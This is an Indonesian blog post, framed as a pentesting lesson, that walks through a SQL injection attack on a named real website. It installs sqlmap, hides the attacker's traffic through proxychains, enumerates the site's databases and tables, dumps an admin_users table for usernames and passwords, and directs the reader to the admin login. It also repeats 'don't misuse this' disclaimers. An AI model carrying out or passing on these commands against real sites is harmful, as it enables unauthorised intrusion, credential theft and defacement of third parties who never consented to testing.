SQLmap Web Database Pentesting

Sahabat blogger, tentu kalian tidak asing lagi dengan tool yang satu ini, terutama pecinta pentesting, banyak sekali defacer menggunakan trik ini untuk mengatahui database suatu web sakaligus passwordnya, tapi tidak ada salahnya kita mencoba..
namun sebelumnya saya sampaikan, tolong ilmu ini hanya sekedar pembelajaran saja sucuil ilmu tentang pentesting security, mohon janga disalah gunakan..

Untuk menghindari tindakan kriminal, saya dalam menulis artikel ini hanya sebatas menyampaikan hasil dari vuln dan deface dari hacker luar negeri, jadi murni bukan dari saya pribadi, karena maksud saya menulis artikel ini hanya sebatas menyampaikan dan menularkan ilmu kepada teman-teman semuanya...
jadi mohon jangan disalah gunakan, ok ^_^

sebelumnya siapkan dulu alat tempurnya, yaitu sqlmap..
bagi kalian pengguna distro pentesting seperti backtrack dan blackbuntu tentu tidak usah repot-repot install aplikasi ini karena sudah default terinstall di kedua distro tersebut, namun pentesting dapat dilakukan di distro manapun, karenan kemampuan anda menggambarkan reputasi anda, bukan berbagai tools yang anda miliki, toh tools yang anda pakai adalah buatan orang lain, apalagi berbasis GUI,, gak banget deh 
bagi pengguna ubuntu seperti saya install dulu aplikasinya, jangan lupa tambahkan repo backtrack, caranya dapat dilihat disini Update dan Upgrade Java MacBuntu rasa BackTrack.
silahkan install sqlmapnya, jangan lupa jalan di root


root@arum:/home/sandy# apt-get install sqlmap
klo sudah install akan nampak seperti ini 

setelah aplikasi sqlmap terinstall sekarang kita cari target, tentunya yang mempunya vuln,
dan saya tegaskan saya tidak berniat jahat untuk merusak, untuk anda lebih percaya bahwa tujuan saya adalah "baik-baik" maka saya akan memilih target yang pernah dijamah hacker luar, sepertinya hacker dari turki, untuk meyakinkan silahkan kunjungi alamat berikut http://www.hanhdance.com/
lihat laman utamanya, sudah pernah di deface orang lain kan?

tips selanjutnya, agar lebih aman dalam melakukan pentesting sebagai anda menggunakan jalur proxy, sukur-sukur ssh tunneling,
kalian dapat menggunakan tools proxychains, untuk konfigurasinya dapat kalian lihat di sini 

Tunneling ssh dengan PAC Tunnel Manager di Ubuntu

Tunneling SSH di Linux Ubuntu

dan vuln websitenya adalah : http://www.hanhdance.com/gallery.php?id=47

itu target kita gan, buka aplikasi sqlmap atau bisa melalui terminal, jangan lupa status root


root@arum:/home/sandy# cd /pentest/database/sqlmap/
root@arum:/pentest/database/sqlmap# 

root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u www.webtarget.com --dbs
maka: 
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 --dbs
dan nampak list databasenya

available databases [3]:                                                       
[*] hanhdanceeditor
[*] information_schema
[*] test

root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.webtarget.com -D nama_database --tables
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor --tables
dan nampak list tables dari database hanhdanceeditor

root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.webtarget.com -D nama_database -T nama_tables --columns
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor -T admin_users --columns
maka akan terlihat list columns
Database: hanhdanceeditor                                                      
Table: admin_users

sekarang finalisasi eksekusi deh pass dan user dengan dump
root@arum:/pentest/database/sqlmap#proxychains python sqlmap.py -u www.webtarget.com -D nama_database -T nama_tables --dump
root@arum:/pentest/database/sqlmap#proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor -T admin_users --dump
taraaaa, password dan usernya sudah terlihat
Table: admin_users
sekarang buka laman berikut dan masukan user dan passwordnya



Halaman Admin Target





silahkan dicoba, tapi ingat jangan disalahgunakan ea? ^_^





2 komentar:

Kerah Ledrek mengatakan...

gan bisa gak sqlmap digabung ma tsocks?

Dejan mengatakan...

bisa gan, sama aja kok

Posting Komentar

 

Linux Opensource & Phreaking Copyright © 2011-2012 | Powered by Blogger